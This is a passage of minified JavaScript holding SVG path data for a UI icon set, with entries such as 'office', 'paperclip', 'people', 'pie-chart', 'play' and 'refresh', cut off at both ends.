0-.42-.08-.8-.23-1.12-.15-.33-.36-.59-.62-.8-.26-.21-.55-.37-.87-.48-.32-.11-.65-.16-.98-.16-.43 0-.82.08-1.16.25-.34.16-.63.39-.87.69-.24.29-.43.64-.57 1.04-.14.4-.22.83-.23 1.3h1.39c-.01-.25.02-.49.07-.72.06-.23.14-.44.26-.63s.27-.34.45-.45c.18-.11.39-.17.63-.17.39 0 .71.12.96.37s.37.58.37.99c0 .29-.05.54-.16.74-.11.2-.25.36-.43.47-.18.11-.38.19-.61.24-.23.05-.46.06-.68.05v1.17c.28-.01.55 0 .81.03s.5.1.71.21c.21.11.38.28.51.5.13.22.2.52.2.89 0 .55-.16.97-.47 1.27-.31.3-.7.45-1.17.45-.55 0-.95-.19-1.23-.58-.27-.39-.4-.88-.38-1.46h-1.39c.01.5.08.96.21 1.38.13.41.32.77.57 1.06.25.29.56.52.93.68.37.16.8.24 1.3.24.41 0 .79-.07 1.16-.21.37-.14.69-.33.96-.58.28-.25.5-.56.66-.92a3 3 0 0 0 .24-1.23c0-.64-.14-1.17-.41-1.61zM8.58 12.41c.21-.18.45-.36.7-.53.25-.18.5-.36.75-.56.25-.2.49-.41.73-.63.23-.22.44-.47.63-.74.18-.27.33-.56.44-.88.11-.32.16-.67.16-1.07 0-.32-.05-.65-.14-1-.09-.35-.25-.68-.47-.97-.22-.3-.51-.55-.87-.74-.36-.2-.81-.29-1.35-.29-.49 0-.93.1-1.3.29-.37.18-.69.44-.95.78-.26.33-.45.73-.58 1.2-.13.46-.2.96-.2 1.5h1.43c.01-.35.04-.67.09-.97.05-.3.14-.56.25-.78.11-.22.26-.39.45-.52s.43-.19.71-.19c.31 0 .56.06.75.18.19.12.34.26.45.43.11.17.18.36.22.56.04.2.06.39.06.57-.01.38-.1.72-.26 1.02-.15.3-.37.57-.63.83-.26.25-.54.49-.85.71-.31.22-.61.45-.89.68-.6.45-1.06.98-1.41 1.58-.35.61-.52 1.32-.53 2.13h6.01v-1.43H7.69c.06-.21.17-.42.33-.61s.34-.38.56-.55z"],office:["M19 6h-5V1c0-.55-.45-1-1-1H1C.45 0 0 .45 0 1v18c0 .55.45 1 1 1h4v-6h4v6h10c.55 0 1-.45 1-1V7c0-.55-.45-1-1-1zM6 12H2V8h4v4zm0-6H2V2h4v4zm6 6H8V8h4v4zm0-6H8V2h4v4zm6 11h-4v-3h4v3zm0-5h-4V8h4v4z"],offline:["M10 0C4.48 0 0 4.48 0 10s4.48 10 10 10 10-4.48 10-10S15.52 0 10 0zM7 18l2-7H5l8-9-2 7h4l-8 9z"],"oil-field":["M19 17.99h-1.36l-4.35-9.57 2.91-.86 1.66 4.1c.11.27.43.4.72.31.12-.04.22-.11.28-.2.06-.11 1.47-2.08 1.05-5.6C19.79 5.12 19.3 0 16.01 0 14.89.01 13.99.83 14 1.84c0 .19.04.38.1.56l1.34 3.31L.72 10.03v.02c-.41.12-.72.49-.72.94 0 .55.45 1 1 1 .1 0 .19-.03.28-.06v.02l2-.59 1.47 6.63H3c-.55 0-1 .45-1 1s.45 1 1 1h16c.55 0 1-.45 1-1s-.45-1-1-1zM5.2 10.8l3.95-1.16-2.83 6.22L5.2 10.8zm2.35 7.19l3.95-8.68 3.95 8.68h-7.9z"],"one-column":["M14.94 0h-4c-.55 0-1 .45-1 1v18c0 .55.45 1 1 1h4c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm-8 6c-.28 0-.53.11-.71.29l-3 3c-.18.18-.29.43-.29.71s.11.53.29.71l3 3A1.003 1.003 0 0 0 7.94 13V7c0-.55-.45-1-1-1z"],outdated:["M10 0c5.52 0 10 4.48 10 10s-4.48 10-10 10S0 15.52 0 10c0-.55.45-1 1-1s1 .45 1 1c0 4.42 3.58 8 8 8s8-3.58 8-8-3.58-8-8-8C7.47 2 5.22 3.17 3.76 5H5c.55 0 1 .45 1 1s-.45 1-1 1H1c-.55 0-1-.45-1-1V2c0-.55.45-1 1-1s1 .45 1 1v2.05C3.82 1.6 6.71 0 10 0zm1 16H9v-2h2v2zm0-3H9V4h2v9z"],"page-layout":["M19 1H1c-.55 0-1 .45-1 1v16c0 .55.45 1 1 1h18c.55 0 1-.45 1-1V2c0-.55-.45-1-1-1zM7 17H2V8h5v9zm11 0H8V8h10v9zm0-10H2V3h16v4z"],"panel-stats":["M1 1h18a1 1 0 0 1 1 1v15a1 1 0 0 1-1 1H1a1 1 0 0 1-1-1V2a1 1 0 0 1 1-1zm1 2v13h16V3H2zm9 0h1v13h-1V3zm2 7h3.952v1H13v-1zm0 2h3.952v1H13v-1zm0 2h3.952v1H13v-1zm0-6h3.952v1H13V8zm0-2h3.952v1H13V6zm0-2h3.952v1H13V4z"],"panel-table":["M19 1H1c-.6 0-1 .4-1 1v15c0 .6.4 1 1 1h18c.6 0 1-.4 1-1V2c0-.6-.4-1-1-1zm-9 11H7V9h3v3zm0-4H7V5h3v3zm-8 8V3h4v13H2zm5 0v-3h3v3H7zm11 0h-7v-3h7v3zm0-4h-7V9h7v3zm0-4h-7V5h7v3z"],paperclip:["M18.35 2.67A5.664 5.664 0 0 0 14.33 1c-1.44 0-2.89.56-3.99 1.67l-9.16 9.27C.4 12.73 0 13.78 0 14.83s.39 2.1 1.18 2.9c.78.79 1.82 1.18 2.85 1.18 1.04 0 2.07-.39 2.87-1.2l9.14-9.27c.96-.96.96-2.5.02-3.45-.94-.95-2.49-.96-3.44 0l-7.59 7.69c-.31.32-.3.83.01 1.14.31.31.81.31 1.13.02l7.59-7.69c.31-.31.84-.31 1.13-.02.31.31.31.85 0 1.16l-9.14 9.27c-.93.95-2.54.93-3.45.02-.94-.95-.92-2.55.02-3.49l9.16-9.25c1.55-1.56 4.18-1.59 5.72-.03 1.56 1.57 1.55 4.26 0 5.82l-8.89 9.02c-.3.31-.3.81.01 1.11.3.3.79.31 1.1.01v.01l8.91-9.02A5.645 5.645 0 0 0 20 6.73c0-1.48-.55-2.94-1.65-4.06z"],paragraph:["M16.5 1H7C4.2 1 2 3.2 2 6s2.2 5 5 5v6.5c0 .8.7 1.5 1.5 1.5s1.5-.7 1.5-1.5V4h2v13.5c0 .8.7 1.5 1.5 1.5s1.5-.7 1.5-1.5V4h1.5c.8 0 1.5-.7 1.5-1.5S17.3 1 16.5 1z"],path:["M18 0H2C.9 0 0 .9 0 2s.9 2 2 2h7v4H4c-1.1 0-2 .9-2 2s.9 2 2 2h5v4H6c-1.1 0-2 .9-2 2s.9 2 2 2h8c1.1 0 2-.9 2-2s-.9-2-2-2h-3v-4h5c1.1 0 2-.9 2-2s-.9-2-2-2h-5V4h7c1.1 0 2-.9 2-2s-.9-2-2-2z"],"path-search":["M4 7c-.55 0-1 .45-1 1s.45 1 1 1 1-.45 1-1-.45-1-1-1zm15 11.69l-5-2.5v-3.63c-.32.11-.66.22-1 .29v3.32l-6 2.57v-7.25c-.36-.27-.69-.57-1-.9v8.1l-5-2.5V10c.55 0 1-.45 1-1s-.45-1-1-1V1.31l3.43 1.71c.11-.31.24-.62.39-.92L.72.05A.545.545 0 0 0 .5 0C.22 0 0 .22 0 .5v16c0 .2.12.36.28.44l6 3c.07.04.14.06.22.06.07 0 .14-.01.2-.04l6.79-2.91 5.79 2.9c.07.03.14.05.22.05.28 0 .5-.22.5-.5v-4.21c-.31.13-.64.21-1 .21v3.19zM10 5c-.55 0-1 .45-1 1s.45 1 1 1 1-.45 1-1-.45-1-1-1zm3-1c-.55 0-1 .45-1 1s.45 1 1 1 1-.45 1-1-.45-1-1-1zm6.72-.94l-1.43-.72c.2.43.36.89.48 1.36l.23.11V5.5c-.55 0-1 .45-1 1s.45 1 1 1v1.96l1 1V3.5c0-.2-.12-.36-.28-.44zm-3.69 5.56c.14-.21.27-.42.38-.65.02-.04.04-.07.05-.11.11-.22.2-.45.28-.69v-.01c.07-.24.13-.48.17-.73l.03-.17c.04-.25.06-.5.06-.76C17 2.46 14.54 0 11.5 0S6 2.46 6 5.5 8.46 11 11.5 11c.26 0 .51-.02.76-.06l.17-.03c.25-.04.49-.1.73-.17h.01c.24-.08.47-.17.69-.28.04-.02.07-.03.11-.05.23-.11.44-.24.65-.38l.18.18 3.5 3.5c.17.18.42.29.7.29a1.003 1.003 0 0 0 .71-1.71l-3.68-3.67zm-4.53.88c-2.21 0-4-1.79-4-4s1.79-4 4-4 4 1.79 4 4-1.79 4-4 4z"],pause:["M7 3H4c-.55 0-1 .45-1 1v12c0 .55.45 1 1 1h3c.55 0 1-.45 1-1V4c0-.55-.45-1-1-1zm9 0h-3c-.55 0-1 .45-1 1v12c0 .55.45 1 1 1h3c.55 0 1-.45 1-1V4c0-.55-.45-1-1-1z"],people:["M16.94 17a4.92 4.92 0 0 0-.33-1.06c-.45-.97-1.37-1.52-3.24-2.3-.17-.07-.76-.31-.77-.32-.1-.04-.2-.08-.28-.12.05-.14.04-.29.06-.45 0-.05.01-.11.01-.16-.25-.21-.47-.48-.65-.79.22-.34.41-.71.56-1.12l.04-.11c-.01.02-.01.02-.02.08l.06-.15c.36-.26.6-.67.72-1.13.18-.37.29-.82.25-1.3-.05-.5-.21-.92-.47-1.22-.02-.53-.06-1.11-.12-1.59.38-.17.83-.26 1.24-.26.59 0 1.26.19 1.73.55.46.35.8.85.97 1.4.04.13.07.25.08.38.08.45.13 1.14.13 1.61v.07c.16.07.31.24.35.62.02.29-.09.55-.15.65-.05.26-.2.53-.46.59-.03.12-.07.25-.11.36-.01.01-.01.04-.01.04-.2.53-.51 1-.89 1.34 0 .06 0 .12.01.17.04.41-.11.71 1 1.19 1.1.5 2.77 1.01 3.13 1.79.34.79.2 1.25.2 1.25h-3.04zm-5.42-3.06c1.47.66 3.7 1.35 4.18 2.39.45 1.05.27 1.67.27 1.67H.04s-.19-.62.27-1.67c.46-1.05 2.68-1.75 4.16-2.4 1.48-.65 1.33-1.05 1.38-1.59 0-.07.01-.14.01-.21-.52-.45-.95-1.08-1.22-1.8l-.01-.01c0-.01-.01-.02-.01-.03-.07-.15-.12-.32-.16-.49-.34-.06-.54-.43-.62-.78-.08-.14-.24-.48-.2-.87.05-.51.26-.74.49-.83v-.08c0-.64.05-1.55.17-2.15a3.648 3.648 0 0 1 1.4-2.36C6.32 2.25 7.21 2 8 2s1.68.25 2.31.73a3.63 3.63 0 0 1 1.4 2.36c.11.6.17 1.52.17 2.15v.09c.22.09.42.32.47.82.03.39-.12.73-.2.87-.07.34-.27.71-.61.78-.04.16-.09.33-.15.48-.01.01-.02.05-.02.05-.27.71-.68 1.33-1.19 1.78 0 .08 0 .16.01.23.05.55-.15.95 1.33 1.6z"],percentage:["M15 10c-1.66 0-3 1.34-3 3v2c0 1.66 1.34 3 3 3s3-1.34 3-3v-2c0-1.66-1.34-3-3-3zm1 5c0 .55-.45 1-1 1s-1-.45-1-1v-2c0-.55.45-1 1-1s1 .45 1 1v2zM8 7V5c0-1.66-1.34-3-3-3S2 3.34 2 5v2c0 1.66 1.34 3 3 3s3-1.34 3-3zM4 7V5c0-.55.45-1 1-1s1 .45 1 1v2c0 .55-.45 1-1 1s-1-.45-1-1zm11-4a1.003 1.003 0 0 0-1.88-.48L5.14 16.49a1.003 1.003 0 0 0 1.74.99l7.99-13.97c.08-.15.13-.32.13-.51z"],person:["M19.61 17.91c-.57-1.32-3.35-2.19-5.19-3.01-1.85-.82-1.59-1.31-1.66-1.99-.01-.09-.01-.19-.02-.29.63-.56 1.15-1.33 1.49-2.22 0 0 .02-.05.02-.06.07-.19.13-.39.19-.6.42-.09.67-.55.76-.98.1-.17.29-.6.25-1.08-.06-.62-.31-.91-.59-1.03v-.11c0-.79-.07-1.93-.22-2.68A4.55 4.55 0 0 0 12.9.92C12.11.32 11 0 10.01 0s-2.1.32-2.89.92a4.55 4.55 0 0 0-1.74 2.94c-.14.75-.22 1.89-.22 2.68v.1c-.29.11-.55.4-.61 1.04-.04.48.15.91.25 1.08.1.44.35.91.79.98.05.21.12.41.19.6 0 .01.01.03.01.04l.01.02c.34.91.87 1.69 1.52 2.25 0 .09-.01.18-.02.26-.07.68.13 1.17-1.72 1.99S.96 16.59.39 17.91C-.18 19.23.05 20 .05 20h19.9s.23-.77-.34-2.09z"],phone:["M19.91 15.51c-.08-.08-4.21-2.5-4.35-2.57a.876.876 0 0 0-.4-.1c-.19 0-.42.13-.71.4-.28.27-1.17 1.49-1.43 1.76s-.48.4-.65.4c-.08 0-.19-.02-.32-.07s-1.45-.73-4.2-3.15-3.11-4-3.13-4.44c0-.17.13-.39.4-.65.28-.25.57-.51.89-.74.32-.24.61-.5.88-.78s.4-.52.4-.71c0-.13-.03-.27-.1-.4C7.12 4.32 4.62.19 4.53.1c-.19-.18-.92-.1-1.29.1C.25 1.82 0 4 .05 4.86c.05.89.61 5.58 5.2 9.93 5.7 5.41 9.66 5.2 9.92 5.2.87 0 3.52-.48 4.65-3.19.16-.38.31-1.07.09-1.29z"],"pie-chart":["M9 .98c-4.5.5-8 4.31-8 8.94 0 4.97 4.03 9.04 9 9.04 4.63 0 8.44-3.96 8.94-7.96H9V.98z","M10-.08V10h10C20 4 15.52-.08 10-.08z"],pin:["M11.77 1.16c-.81.81-.74 2.28.02 3.76L6.1 8.71c-2.17-1.46-4.12-2-4.94-1.18l4.95 4.95-4.95 6.36 6.36-4.95 4.95 4.95c.82-.82.27-2.77-1.19-4.94l3.8-5.69c1.47.76 2.94.84 3.76.02l-7.07-7.07z"],pivot:["M5.83 9.75L.29 15.29a1.003 1.003 0 0 0 1.42 1.42l5.54-5.54c-.57-.37-1.05-.85-1.42-1.42zM19 11c-.55 0-1 .45-1 1v1.59l-3.83-3.83c-.37.56-.85 1.04-1.41 1.41L16.59 15H15c-.55 0-1 .45-1 1s.45 1 1 1h4c.55 0 1-.45 1-1v-4c0-.55-.45-1-1-1zm-5-4c0-2.21-1.79-4-4-4S6 4.79 6 7s1.79 4 4 4 4-1.79 4-4zm-4 2c-1.1 0-2-.9-2-2s.9-2 2-2 2 .9 2 2-.9 2-2 2z"],"pivot-table":["M3 5H1c-.55 0-1 .45-1 1v13c0 .55.45 1 1 1h2c.55 0 1-.45 1-1V6c0-.55-.45-1-1-1zm0-5H1C.45 0 0 .45 0 1v2c0 .55.45 1 1 1h2c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm13.71 5.29C16.53 5.11 16.28 5 16 5s-.53.11-.71.29l-3 3a1.003 1.003 0 0 0 1.42 1.42L15 8.41V11c0 2.21-1.79 4-4 4H8.41l1.29-1.29c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71l-3 3c-.18.18-.29.43-.29.71 0 .28.11.53.29.71l3 3a1.003 1.003 0 0 0 1.42-1.42L8.41 17H11c3.31 0 6-2.69 6-6V8.41l1.29 1.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71l-3-3zM19 0H6c-.55 0-1 .45-1 1v2c0 .55.45 1 1 1h13c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1z"],play:["M16 10c0-.36-.2-.67-.49-.84l.01-.01-10-6-.01.01A.991.991 0 0 0 5 3c-.55 0-1 .45-1 1v12c0 .55.45 1 1 1 .19 0 .36-.07.51-.16l.01.01 10-6-.01-.01c.29-.17.49-.48.49-.84z"],plus:["M16 9h-5V4c0-.55-.45-1-1-1s-1 .45-1 1v5H4c-.55 0-1 .45-1 1s.45 1 1 1h5v5c0 .55.45 1 1 1s1-.45 1-1v-5h5c.55 0 1-.45 1-1s-.45-1-1-1z"],"polygon-filter":["M18 7c-.27 0-.52.05-.75.15l-6.28-4.88c.01-.09.03-.18.03-.27 0-1.1-.9-2-2-2S7 .9 7 2c0 .06.01.12.02.19l-4.19 3C2.57 5.07 2.29 5 2 5 .9 5 0 5.9 0 7c0 .74.4 1.38 1 1.72v7.55c-.6.35-1 .99-1 1.73 0 1.1.9 2 2 2 .74 0 1.38-.4 1.72-1h7.55c.35.6.98 1 1.72 1 1.1 0 2-.9 2-2 0-.37-.11-.72-.29-1.02L18.03 11A2 2 0 0 0 18 7zm-5.03 9c-.72.01-1.35.41-1.69 1H3.72c-.17-.3-.42-.55-.72-.72V8.72c.6-.34 1-.98 1-1.72 0-.06-.01-.12-.02-.19l4.19-3c.26.12.54.19.83.19.27 0 .52-.05.75-.15l6.28 4.88c-.01.09-.03.18-.03.27 0 .37.11.72.29 1.02L12.97 16z"],power:["M10 10c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1S9 .45 9 1v8c0 .55.45 1 1 1zm3-7.45v2.16c2.36 1.12 4 3.5 4 6.29 0 3.87-3.13 7-7 7s-7-3.13-7-7c0-2.79 1.64-5.17 4-6.29V2.55C3.51 3.79 1 7.09 1 11a9 9 0 0 0 18 0c0-3.91-2.51-7.21-6-8.45z"],"predictive-analysis":["M20 8.01c0-1.26-.61-2.43-1.61-3.12C17.86 2.5 15.8.79 13.4.79c-.58 0-1.14.1-1.69.29A3.533 3.533 0 0 0 9.17 0C8.05 0 7 .55 6.32 1.45c-.15-.02-.3-.03-.45-.03-1.63 0-3.03 1.12-3.46 2.71C.97 4.65 0 6.05 0 7.66c0 .48.09.95.26 1.4-.17.44-.26.91-.26 1.39 0 1.38.72 2.64 1.89 3.29.67.7 1.59 1.09 2.54 1.09.61 0 1.19-.15 1.71-.45.68.82 1.68 1.3 2.73 1.3.66 0 1.28-.18 1.83-.52.61.49 1.34.81 2.11.91 1.3 1.43 2.3 3.28 2.31 3.3 0 0 .35.61.33.61.96-.01 1.77-.2 1.64-1.3.01.02-.92-2.89-.92-2.89.52-.26.94-.69 1.21-1.23 1.12-.66 1.84-1.91 1.84-3.26 0-.3-.03-.6-.1-.89.57-.64.88-1.51.88-2.4zm-1.54 1.28l-.18-.2-.77-.84c-.33-.37-.67-1.17-.73-1.73 0 0-.13-1.25-.13-1.26-.06-.74-1.17-.73-1.13.14 0 .02.13 1.26.13 1.26.04.36.15.77.3 1.17-.08-.01-.15-.02-.22-.02 0 0-2.57-.12-2.57-.13-.73-.03-.89 1.22-.05 1.25l2.57.13c.53.03 1.29.37 1.61.72l.61.67.02.06c.1.27.14.55.14.83 0 .93-.51 1.77-1.34 2.18l-.2.1-.09.23c-.19.48-.6.82-1.1.93l-.67.14.87 2.75c-.48-.76-1.19-1.79-2.02-2.67l-.15-.16-.21-.02c-.51-.04-.99-.21-1.42-.48l1.7-1.48c.44-.39 1.04-.55 1.24-.49 0 0 .78.22.78.23.78.2 1.03-.92.29-1.21l-.78-.23c-.69-.2-1.67.22-2.24.72l-1.91 1.66-.39.32c-.44.36-.93.55-1.5.55-.8 0-1.54-.41-1.97-1.07v-1.88c0-.5.21-.98.34-1.07 0 0 .65-.43.64-.43.87-.69.21-1.57-.64-1.14 0-.01-.65.43-.65.43-.31.2-.54.56-.7.97-.13-.13-.28-.25-.43-.35 0 0-1.91-1.26-1.91-1.28-.81-.56-1.5.63-.61 1.11 0-.02 1.89 1.28 1.89 1.28.46.31.77.97.77 1.36v.84c-.43.24-.78.36-1.24.36-.67 0-1.31-.29-1.77-.79l-.07-.08-.09-.05a2.425 2.425 0 0 1-1.31-2.16c0-.38.09-.74.25-1.08l.15-.31-.14-.33c-.17-.34-.25-.7-.25-1.08 0-1.13.76-2.1 1.85-2.37l.39-.09.07-.43a2.41 2.41 0 0 1 2.39-2.05c.19 0 .39.02.58.07l.4.1.22-.38A2.41 2.41 0 0 1 9.17 1.3c.55 0 1.08.19 1.5.53l-.44.45-.01-.01-.31.31c-.41.35-.92.53-1.11.5 0 0-.84-.13-.84-.14-.83-.15-1.09 1.08-.18 1.29.01 0 .84.14.84.14.03 0 .06 0 .09.01-.14.46-.18.96-.12 1.4 0 0 .21 1.24.19 1.23.13.65 1.32.44 1.16-.22 0-.01-.19-1.23-.19-1.23-.07-.48.15-1.19.45-1.5l.48-.5c.07-.06.13-.12.19-.18l.93-.95c.5-.23 1.04-.34 1.59-.34 1.93 0 3.57 1.4 3.89 3.34l.05.31.26.15a2.445 2.445 0 0 1 .87 3.4z"],prescription:["M13.95 10.23c.16-.18.22-.22.46-.22h1.48c.25 0 .47.08.59.33.1.2.09.41-.05.66l-2.71 3.58L16.88 19c.13.21.16.46.03.69-.12.21-.34.31-.57.31H14.7c-.31 0-.56-.17-.7-.44l-1.9-2.67-1.93 2.68c-.15.27-.42.43-.73.43H7.98c-.25 0-.47-.08-.59-.33-.1-.2-.09-.41.05-.66l3.09-4.35L6.26 9H5v4.32c0 .41-.3.69-.7.69H2.7c-.41 0-.7-.28-.7-.69V.69c0-.41.3-.69.7-.69h4.42c.71 0 1.36.1 1.94.3.59.2 1.11.49 1.54.87.44.38.78.84 1.02 1.39.24.54.36 1.14.36 1.78 0 1.01-.28 1.88-.84 2.6-.43.54-1.35 1.29-2 1.59l3.09 3.94 1.72-2.24zM6.71 6.04c.71 0 1.45-.16 1.81-.46.33-.28.5-.69.5-1.25s-.17-.97-.5-1.25c-.35-.3-1.1-.46-1.81-.46h-1.7v3.42h1.7z"],presentation:["M19 1h-8c0-.55-.45-1-1-1S9 .45 9 1H1c-.55 0-1 .45-1 1s.45 1 1 1h1v11c0 .55.45 1 1 1h4.59L4.3 18.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71L9 16.41V19c0 .55.45 1 1 1s1-.45 1-1v-2.59l3.29 3.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71L12.41 15H17c.55 0 1-.45 1-1V3h1c.55 0 1-.45 1-1s-.45-1-1-1zm-3 12H4V3h12v10z"],print:["M14 16H6v-4H4v5c0 .55.45 1 1 1h10c.55 0 1-.45 1-1v-5h-2v4zm2-13c0-.55-.45-1-1-1H5c-.55 0-1 .45-1 1v1h12V3zm3 2H1c-.55 0-1 .45-1 1v7c0 .55.45 1 1 1h2v-3h14v3h2c.55 0 1-.45 1-1V6c0-.55-.45-1-1-1zm-1 4h-2V7h2v2z"],projects:["M18 4c0-.55-.45-1-1-1H3c-.55 0-1 .45-1 1v2h16V4zm-2-3c0-.55-.45-1-1-1H5c-.55 0-1 .45-1 1v1h12V1zm3 6H1c-.55 0-1 .45-1 1v11c0 .55.45 1 1 1h18c.55 0 1-.45 1-1V8c0-.55-.45-1-1-1zm-5 7c0 .55-.45 1-1 1H7c-.55 0-1-.45-1-1v-2h1v2h6v-2h1v2z"],properties:["M2 15c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm0-7c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm5-4h12c.55 0 1-.45 1-1s-.45-1-1-1H7c-.55 0-1 .45-1 1s.45 1 1 1zM2 1C.9 1 0 1.9 0 3s.9 2 2 2 2-.9 2-2-.9-2-2-2zm17 8H7c-.55 0-1 .45-1 1s.45 1 1 1h12c.55 0 1-.45 1-1s-.45-1-1-1zm0 7H7c-.55 0-1 .45-1 1s.45 1 1 1h12c.55 0 1-.45 1-1s-.45-1-1-1z"],property:["M3 5c1.1 0 2-.9 2-2s-.9-2-2-2-2 .9-2 2 .9 2 2 2zm5-1h11c.55 0 1-.45 1-1s-.45-1-1-1H8c-.55 0-1 .45-1 1s.45 1 1 1zM3 15c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm16 1H8c-.55 0-1 .45-1 1s.45 1 1 1h11c.55 0 1-.45 1-1s-.45-1-1-1zm-1-8H9c-1.1 0-2 .9-2 2s.9 2 2 2h9c1.1 0 2-.9 2-2s-.9-2-2-2zM3 7c-1.66 0-3 1.34-3 3s1.34 3 3 3 3-1.34 3-3-1.34-3-3-3z"],"publish-function":["M7.01 10.11c.35-.64.72-1.68 1.09-3.11l.8-3.03h.96l.24-.77h-.99c.28-1.11.66-1.92 1.12-2.43.28-.32.56-.48.83-.48.05 0 .1.02.13.05.03.03.05.07.05.12 0 .04-.04.13-.11.25-.08.12-.11.24-.11.35 0 .15.06.28.18.39.12.11.27.16.45.16.2 0 .36-.07.49-.2s.2-.31.2-.54c0-.26-.1-.47-.3-.63-.2-.16-.52-.24-.96-.24-.68 0-1.3.19-1.86.58-.55.38-1.08 1.02-1.58 1.91-.17.3-.34.5-.49.59-.15.08-.4.13-.74.12l-.23.77h.95L5.74 9.21c-.23.86-.39 1.39-.47 1.59-.12.29-.3.54-.54.75-.1.08-.21.12-.35.12-.04 0-.07-.01-.1-.03l-.03-.04c0-.02.03-.07.1-.13.07-.07.1-.17.1-.31 0-.15-.05-.28-.16-.38-.11-.1-.27-.15-.47-.15-.25 0-.44.07-.59.2-.15.12-.23.28-.23.46 0 .19.09.36.27.5.19.14.47.21.86.21.61 0 1.16-.15 1.63-.46.48-.31.89-.79 1.25-1.43zm3.7 1.18c-.18-.18-.43-.29-.71-.29s-.53.11-.71.29l-3 3a1.003 1.003 0 0 0 1.42 1.42L9 14.41V19c0 .55.45 1 1 1s1-.45 1-1v-4.59l1.29 1.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71l-3-3zm4.15-6.78c.17-.13.36-.2.55-.2.07 0 .2.03.39.08s.36.08.5.08c.2 0 .37-.07.5-.2.13-.14.2-.31.2-.52 0-.22-.07-.4-.2-.53s-.33-.2-.58-.2c-.22 0-.43.05-.63.15-.2.1-.45.32-.75.67-.23.25-.56.7-1.01 1.33a6.52 6.52 0 0 0-.91-2.15l-2.38.39-.05.25c.18-.03.33-.05.45-.05.24 0 .43.1.59.3.25.31.59 1.24 1.02 2.79-.34.44-.58.73-.7.87-.21.22-.38.36-.52.43-.1.05-.22.08-.35.08-.1 0-.26-.05-.49-.16a1.01 1.01 0 0 0-.42-.11c-.23 0-.42.07-.57.22-.17.14-.24.32-.24.55 0 .21.07.38.21.51.14.13.33.2.56.2.23 0 .44-.05.64-.14.2-.09.45-.29.75-.59s.72-.78 1.25-1.43c.2.62.38 1.07.53 1.35.15.28.32.49.52.61.19.12.44.19.73.19.28 0 .57-.1.86-.3.38-.25.77-.69 1.17-1.31l-.25-.14c-.27.37-.48.6-.61.69-.09.06-.19.09-.31.09-.14 0-.28-.09-.42-.26-.23-.29-.54-1.09-.93-2.4.37-.58.66-.96.9-1.14z"],pulse:["M19 10h-2.38L14.9 6.55h-.01c-.17-.32-.5-.55-.89-.55-.43 0-.79.28-.93.66h-.01l-2.75 7.57L7.98 1.82h-.02A.978.978 0 0 0 7 1c-.44 0-.8.29-.94.69h-.01L3.28 10H1c-.55 0-1 .45-1 1s.45 1 1 1h3c.44 0 .8-.29.94-.69h.01l1.78-5.34 2.29 12.21h.02c.08.46.47.82.96.82.43 0 .79-.28.93-.66h.01l3.21-8.82.96 1.92h.01c.16.33.49.56.88.56h3c.55 0 1-.45 1-1s-.45-1-1-1z"],random:["M14.47 5h2.12L15.3 6.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71l3-3c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71l-3-3a1.003 1.003 0 0 0-1.42 1.42L16.59 3H14c-.31 0-.57.15-.76.37l-.01-.01-2.93 3.52 1.3 1.56L14.47 5zm2.24 7.29a1.003 1.003 0 0 0-1.42 1.42l1.3 1.29h-2.12L4.77 3.36l-.01.01A.998.998 0 0 0 4 3H1c-.55 0-1 .45-1 1s.45 1 1 1h2.53l9.7 11.64.01-.01c.19.22.45.37.76.37h2.59l-1.29 1.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71l3-3c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71l-3-3zM3.53 15H1c-.55 0-1 .45-1 1s.45 1 1 1h3c.31 0 .57-.15.76-.37l.01.01 2.93-3.52-1.3-1.56L3.53 15z"],record:["M10 3a7 7 0 1 0 0 14 7 7 0 1 0 0-14z"],redo:["M19.71 5.29l-4-4a1.003 1.003 0 0 0-1.42 1.42L16.59 5H6c-3.31 0-6 2.69-6 6s2.69 6 6 6h5v-2H6c-2.21 0-4-1.79-4-4s1.79-4 4-4h10.59L14.3 9.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71l4-4c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71zM15 14c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2z"],refresh:["M19 1c-.55 0-1 .45-1 1v2.06C16.18 1.61 13.29 0 10 0 4.48 0 0 4.48 0 10c0 .55.45 1 1 1s1-.45 1-1c0-4.42 3.58-8 8-8 2.52 0 4.76 1.18 6.22 3H15c-.55 0-1 .45-1 1s.45 1 1 1h4c.55 0 1-.45 1-1V2c0-.55-.45-1-1-1zm0 8c-.55 0-1 .45-1 1 0 4.42-3.58 8-8 8-2.52 0-4.76-1.18-6.22-3H5c.55 0 1-.45 1-1s-.45-1-1-1H1c-.55 0-1 .45-1 1v4c0 .55.45 1 1 1s1-.45 1-1v-2.06C3.82 18.39 6.71 20 10 20c5.52 0 10-4.48 10-10 0-.55-.45-1-1-1z"],"regression-chart":["M19 16H3.1L19.31 3.39l-.61-.79L2 15.59V3c0-.55-.45-1-1-1s-1 .45-1 1v14c0 .55.45 1 1 1h18c.55 0 1-.45 1-1s-.45-1-1-1zm-9-9c1.1 0 2-.9 2-2s-.9-2-2-2-2 .9-2 2 .9 2 2 2zm-5 4c1.1 0 2-.9 2-2s-.9-2-2-2-2 .9-2 2 .9 2 2 2zm10-2c0 1.1.9 2 2 2s2-.9 2-2-.9-2-2-2-2 .9-2 2zm-5 4c0 1.1.9 2 2 2s2-.9 2-2-.9-2-2-2-2 .9-2 2z"],remove:["M10 0C4.48 0 0 4.48 0 10s4.48 10 10 10 10-4.48 10-10S15.52 0 10 0zm0 18c-4.42 0-8-3.58-8-8s3.58-8 8-8 8 3.58 8 8-3.58 8-8 8zm5-9H5c-.55 0-1 .45-1 1s.45 1 